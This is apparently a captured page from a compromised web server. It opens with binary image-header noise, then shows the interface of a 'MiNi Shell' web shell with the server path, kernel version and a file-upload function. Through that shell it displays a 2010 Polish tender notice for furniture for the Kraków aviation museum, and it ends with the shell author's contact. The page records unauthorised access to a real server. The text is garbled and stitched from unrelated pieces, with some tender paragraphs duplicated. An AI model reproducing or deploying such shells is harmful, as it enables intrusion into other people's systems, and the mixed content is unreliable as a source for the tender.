JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100719/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100719/215468-N-2010.html

<p class="kh_header"><b>Kraków: :Dostawę wyposażenia meblowego dla  Gmachu Głównego Muzeum Lotnictwa Polskiego zlokalizowanego przy ul. Aleja Jana Pawła II 39, 30-969 Kraków</b><br>
<b>Numer ogłoszenia: 215468 - 2010; data zamieszczenia: 19.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Lotnictwa Polskiego w Krakowie , Al. Jana Pawła II 39, 30-969 Kraków, woj. małopolskie, tel. 012 6428700, faks 012 6428700.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorzadowa instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> :Dostawę wyposażenia meblowego dla  Gmachu Głównego Muzeum Lotnictwa Polskiego zlokalizowanego przy ul. Aleja Jana Pawła II 39, 30-969 Kraków.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa  wyposażenia meblowego dla pomieszczeń biurowych, biblioteki, sali wielofunkcyjnej, baru muzealnego, pokoi gościnnych oraz komunikacji Gmachu Głównego Muzeum Lotnictwa Polskiego z siedzibą w Krakowie, ul. Aleja Jana Pawła II 39. Zamówienie obejmuje również wniesienie przedmiotu zamówienia w miejsca wskazane (na poszczególne kondygnacje, do poszczególnych sal i pomieszczeń) przez Zamawiającego oraz montaż.
Zamówienie składa się z 3 części.
Część 1 

LP	ASORTYMENT	OPIS	ILOŚĆ
1	O parametrach takich jak Maro Konsul G203  BIURKO GABINETOWE	BLAT Z PŁYTY WIÓROWEJ LAMINOWANEJ, Wstawka ze szkła satynowanego o grubości 8mm	2
2	O parametrach takich jak  BN Office Solution MOJITO 616	OPARCIE KRZESŁA DREWNIANE-VENGE TAPICEROWANE JEDNOSTRONNIE TAPICERKĄ SKÓRZANĄ( CZARNA SKÓRA 1 SZT I CZERWONA SKÓRA 1 SZT), PODSTAWA CHROM, MECHANIZM PODPARCIA LĘDŹWI,K1F KÓŁKA DO TWARDYCH POWIERZCHNI, PODSTAWA WYKOŃCZONA DREWNIANYMI WSTAWKAMI	2
3	O parametrach takich jak  BN Office Solution MOJITO 812	CHROM, PLECY DREWNO VENGE , TAPICERKA SKÓRA (CZARNA 2 SZT I CZERWONA 2 SZT),STOPKI DO TWARDEJ POWIERZCHNI	4
4	O parametrach takich jak  BN Office Solution MOJITO 226	OPARCIE KRZESŁA i ZAGŁÓWEK SIATKOWE, SIEDZISKO  SKÓRA CZERWONA, PODSTAWA CHROM, MECHANIZM PODPARCIA LĘDŹWI,K1F KÓŁKA DO TWARDYCH POWIERZCHNI	1
4a	O parametrach takich jak  BN Office Solution  Mojito 616 alcantara	OPARCIE KRZESŁA DREWNIANE-VENGE TAPICEROWANE JEDNOSTRONNIE tkanina alcantara, PODSTAWA CHROM, MECHANIZM PODPARCIA LĘDŹWI,K1F-KÓŁKA DO TWARDYCH POWIERZCHNI, PODSTAWA WYKOŃCZONA DREWNIANYMI WSTAWKAMI	1
5	O parametrach takich jak  BN Office Solution PS STOLIK SZKLANY OKRAGŁY	STOLIK FI 80, SZKŁO SATYNA, CHROM	3
6	O parametrach takich jak  BN Office Solution PS STOLIK OKRĄGŁY	STOLIK FI 80, BLAT Z PŁYTY LAMINOWANEJ, PODSTAWA ALU	1
7	O parametrach takich jak  BN Office Solution PS BIURKO L 180X100X60	PRAWE, BLAT PŁYTA LAMINOWANA MS,PODSTAWA ALU, CHROMOWANE DETALE, PRZELOTKA KWADRATOWA W KOLORZE ALU	9
8	O parametrach takich jak  BN Office Solution  PS BIURKO L 180X100X60	LEWE,  J W	3
9	O parametrach takich jak  BN Office Solution PANEL DO BIURKA PS 180	PANEL BEZ TAPICERKI, KOLOR MS	7
10	O parametrach takich jak  BN Office Solution PANEL DO BIURKA PS 160	PANEL BEZ TAPICERKI, KOLOR MS	3
11	O parametrach takich jak BN Office Solution PÓŁECZKA ZAWIESZANA NA PANEL PŁYTA MS	PÓŁKA POMOCNIK, NA UCHWYTACH ALU, DO ZAWIESZENIA NA PANEL, KOLOR MS	18
12	O parametrach takich jak  BN Office Solution PS BIURKO PROSTE 160X80	PŁYTA MS, PODSTAWA ALU, CHROMOWANE DETALE,PRZELOTKA KWADRATOWA W KOLORZE ALU	4
13	O parametrach takich jak  BN Office Solution PS BIURKO PROSTE 180X80	PŁYTA MS, PODSTAWA ALU, CHROMOWANE DETALE,PRZELOTKA KWADRATOWA W KOLORZE ALU	8
14	O parametrach takich jak  BN Office Solution SQART BIURKO 120 140X140X80	BIURKO KĄTOWE, BLAT-PŁYTA MS, PODSTAWA ALU	4
15	O parametrach takich jak PS STÓŁ 180X80	PŁYTA MS, PODSTAWA ALU, CHROMOWANE DETALE,PRZELOTKA KWADRATOWA W KOLORZE ALU	1
16	O parametrach takich jak  BN Office Solution SQART DOSTAWKA 80głX60dł	DOSTAWKA DO BIURKA 120, JAKO PRZEDŁUZENIE BLATU ROBOCZEGO, PŁYTA MS,PODSTAWA ALU	2
17	O parametrach takich jak  BN Office Solution SQ ART. PANEL RECEPCYJNY FRONTOWY 200 wykonany z pleksi	PANEL WYKONANY Z PLEKSI 10MM W RAMCE ALU, POKRYTY FOLIĄ SZRONIONĄ MONTOWANY DO BIURKA  120, BEZ PÓŁKI	1
17a	panel z pleksi dolny boczny140 cm	panel zakrywający nogi, pleksi 10mm+folia szroniona	2
18	O parametrach takich jak  BN Office Solution SQ ART. PANEL DOLNY ZAKRYWAJACY NOGI 140	PANEL BEZ TAPICERKI, KOLOR MS, MONTOWANY DO BIURKA  120	4
20	O parametrach takich jak  BN Office Solution SQART KONTENER MOBILNY	GŁĘBOKOŚĆ 60, PIÓRNIK+3 szuflady, KOLOR MP	5
21	O parametrach takich jak  BN Office Solution SQART KONTENER STACJONARNY NA STOPKACH 4+1	GŁĘBOKOŚĆ 60, PIÓRNIK+4 szuflady,KOLOR MP,TOP KOLOR MS	6
22	O parametrach takich jak  BN Office Solution  SQART KONTENER STACJONARNY NA STOPKACH3+1	GŁĘBOKOŚĆ 60, PIÓRNIK+3 szuflady,KOLOR MP, TOP KOLOR MS	1
23	O parametrach takich jak  BN Office Solution PS KONTENER MOBILNY	GŁĘBOKOŚĆ 60cm, 3 SZUFLADY + PIÓRNIK	14
24	O parametrach takich jak  BN Office Solution PS KONTENER MOBILNY	GŁ.60, 2 SZUFLADY + PIÓRNIK	3
25	O parametrach takich jak  BN Office Solution PS KONTENER STACJONARNY 4+1	GŁĘB.60, KOLOR MP, TOP KOLOR MS, 4SZUFLADY +PIÓRNIK	3
26	O parametrach takich jak BN Office SolutionPS KONTENER STACJONARNY 3+1	GŁĘB.60, KOLOR MP, TOP KOLOR MS, 3SZUFLADY +PIÓRNIK	3
27	O parametrach takich jak  BN Office Solution TRINITY 113	PODSTAWA CHROMOWANA, K2F KÓŁKA DO TWARDYCH POWIERZCHNI, L2 MECHANIZM PODPARCIA LĘDŹWI, TAPICERKA LUCY DWUKOLOROWA  SIEDZISKO GRAFIT  LC046, OPARCIE CZERWIEŃ LC105	22
28	O parametrach takich jak  BN Office Solution STÓŁ OKRĄGŁY FI 100	BLAT Z PŁYTY MS, PODSTAWA  ALU, NOGA OKRĄGŁA	1
29	O parametrach takich jak  BN Office Solution STÓŁ OKRĄGŁY FI 80	BLAT MS, PODSTAWA ALU 	1
30	O parametrach takich jak  BN Office Solution SOFA 2-OS TUTTI	TAPICERKA ALCANTARA CZERWONY CHROM MAT	1
31	O parametrach takich jak  BN Office Solution FOTEL NISKI TUTTI1	TAPICERKA ALCANTARA CZERWONY CHROM MAT	22
32	O parametrach takich jak  BN Office Solution STOLIK TUTTI 110X55	BLAT SZKŁO PRZEZROCZYSTE PODSTAWA CHROM MAT	1
33	Półka na klawiaturę	Półka montowana pod blatem, wykonana z kompozytu w kolorze szarym 62x43	22
33a	O parametrach takich jak KANAŁ KABLOWY POZIOMY PODBLATOWY DO BIURAK PRIMO SPACE BN OFFICE SOLUTION	DO BIUREK PS 180	20
33b	KANAŁ KABLOWY POZIOMY PODBLATOWY	DO BIUREK SQART140	4
33c	KANAŁ KABLOWY POZIOMY PODBLATOWY	DO BIUREK PRIMO SPACE 160	4
35	KANAŁ KABLOWY TRĄBA SŁONIA	 	22
36	O parametrach takich jak PS UCHWYT NA KOMPUTER	UCHWYT NA KOMPUTER, PODWIESZANY POD BIURKO, PROFIL KWADRATOWY CHROM	22
38	O parametrach takich jak STÓŁ KONFERENCYJNY Maro Wing Conference S540	STÓŁ KONFERENCYJNY, BLAT W KOLORZE WENGE z wstawką ze szkła satynowanego o grubości 8mm 	1
  39
	O parametrach takich jak PRZYSTAWKA SZKLANA Maro Wing Conference G217	BLAT ZE SZKŁA 12MM SATYNOWANE, HARTOWANE, OBRABIANE CHEMICZNIE  MATOWIONE	1
40	O parametrach takich jak Kontener Maro Wing Conference	GŁĘBOKOŚĆ 60, PIÓRNIK+3 szuflady	2
41	o parametrach takich jak  BN Office Solution PRZELOTKA	PRZELOTKA KABLOWA	27





Część 2 

Lp	Asortyment	Ilość
1	Stół okrągły wys. 70 cm, średnica blatu 75 cm	5 szt
2	Krzesła barowe 30 x 80 cm	3 szt
3	Krzesło do stołu prezydialnego	1 szt
4	Krzesło do sali wielofunkcyjnej	200 szt

 Część 3

Lp	Asortyment	Ilość
1.	Ogniotrwały sejf na dokumenty z zamkiem elektronicznym wys. 535 mm, szer.410 mm, głębokość 445 mm	1 szt
2.	Szafa na broń z atestowanym zamkiem wys. 1500 mm, szer. 380 mm, głębokość 350 mm	1 szt


2.	Oznaczenie wg CPV  3 913 0000-2 meble biurowe, 3 915 0000-8 różne meble i wyposażenie 
3.	Jeśli w opisach występują: nazwy konkretnego producenta, nazwy koloru z konkretnego katalogu czy zdjęcia konkretnego produktu, należy to traktować jedynie jako pomoc w opisie przedmiotu zamówienia. 
W każdym przypadku dopuszczalne są produkty równoważne pod względem konstrukcji, kolorystyki, materiałów.
4.	Dostarczony sprzęt winien być nowy, nieużywany, bez wad i uszkodzeń.
5.	Dostarczony sprzęt musi posiadać wszystkie wymagane prawem polskim certyfikaty.
6.	Warunki realizacji zamówienia zawarte są we wzorze umowy stanowiącym załącznik nr 5 do niniejszej specyfikacji istotnych warunków zamówienia.
7.	Wymagany minimalny okres gwarancji na dostarczony sprzęt wynosi 24 miesiące, licząc od daty odbioru przedmiotu dostawy. 
8.	Przedmiot zamówienia finansowany jest z udziałem środków unijnych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2, 39.15.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 01.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przed upływem terminu składania ofert, wykonawca zobowiązany jest wnieść wadium przetargowe, na czas równy okresowi związania ofertą, w wysokości: 
	6.000 zł dla części 1
	2.700 zł dla części 2
	   300 zł dla części 3
2. Wadium może być wniesione w jednej lub kilku formach wymienionych w art. 45 ust. 6 ustawy
3. Wadium w formie pieniężnej winno być wniesione przelewem na konto: w Banku PKO BP,  właściciel konta: Muzeum Lotnictwa Polskiego, nr 08 1020 2906 0000 1502 0019 9232  z dopiskiem Wpłata wadium
4. Wadium w pozostałych formach winno być wniesione do kasy znajdującej się w siedzibie Zamawiającego w Sekretariacie Dyrektora. Kasa jest czynna od poniedziałku do piątku w godzinach  od 8:00 do 14:00.
5. Wadium wnoszone w formach innych niż w pieniądzu, winno gwarantować zamawiającemu wypłatę wadium, w przypadku zaistnienia okoliczności wskazanych w art. 46 ust. 4a i 5 ustawy. Niedopuszczalne jest wprowadzanie jakichkolwiek warunków ograniczających zamawiającemu wypłacenie wadium. 
6. Zamawiający zwraca lub zatrzymuje wadium na zasadach i w trybie art. 46 ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2.	Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu:
a)	warunek udziału w postępowaniu o którym mowa w art. 22 ust 1 pkt 2 zostanie uznany za spełniony, gdy Wykonawca wykaże się doświadczeniem w wykonaniu (lub w wykonywaniu - w przypadku świadczeń okresowych lub ciągłych) w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednej dostawy odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia. Za dostawy odpowiadające swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia uważa się dostawy  o wartości co najmniej:
	200.000,00 zł brutto dla części 1
	  90.000,00 zł brutto dla części 2
	  10.000,00 zł brutto dla części 3

3.	Wykonawca w zakresie spełniania warunków udziału w postępowaniu może polegać na doświadczeniu innych podmiotów. 
Zgodnie z opinią Urzędu Zamówień Publicznych (Informator UZP 1 6.	Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w formule spełnia - niespełnia, 
w oparciu o dokumenty załączone do oferty, a których wykaz zawiera punkt VII niniejszej specyfikacji 
7.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia winni ustanowić pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (do oferty należy załączyć odpowiednie pełnomocnictwo) chyba, że w przypadku spółki cywilnej, z umowy tej spółki wynika sposób jej reprezentowania (do stwierdzenia czego niezbędne będzie załączenie do oferty umowy spółki cywilnej). Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z podmiotem występującym jako pełnomocnik pozostałych. Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkie podmioty występujące wspólnie. Wykonawcy wspólnie ubiegający się o zamówienie ponoszą solidarną odpowiedzialność za wykonanie umowy.
2010) w sytuacji gdy wykonawca powołuje się na wiedzę i doświadczenie innych podmiotów niezbędne jest uczestnictwo tych podmiotów przy realizacji zamówienia. (podwykonawstwo) 
6.	Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w formule spełnia - niespełnia, 
w oparciu o dokumenty załączone do oferty, a których wykaz zawiera punkt VII niniejszej specyfikacji 
7.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia winni ustanowić pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (do oferty należy załączyć odpowiednie pełnomocnictwo) chyba, że w przypadku spółki cywilnej, z umowy tej spółki wynika sposób jej reprezentowania (do stwierdzenia czego niezbędne będzie załączenie do oferty umowy spółki cywilnej). Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z podmiotem występującym jako pełnomocnik pozostałych. Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkie podmioty występujące wspólnie. Wykonawcy wspólnie ubiegający się o zamówienie ponoszą solidarną odpowiedzialność za wykonanie umowy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>zgodnie z treścią siwz</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> info@muzeumlotnictwa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Muzeum Lotnictwa Polskiego z siedzibą Aleja Jana Pawła II 39, 30-969 Kraków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.07.2010 godzina 12:00, miejsce: Muzeum Lotnictwa Polskiego z siedzibą Aleja Jana Pawła II 39, 30-969 Kraków, sekretariat Dyrektora.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Małopolski Regionalny Program Operacyjny na lata 2007 - 2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com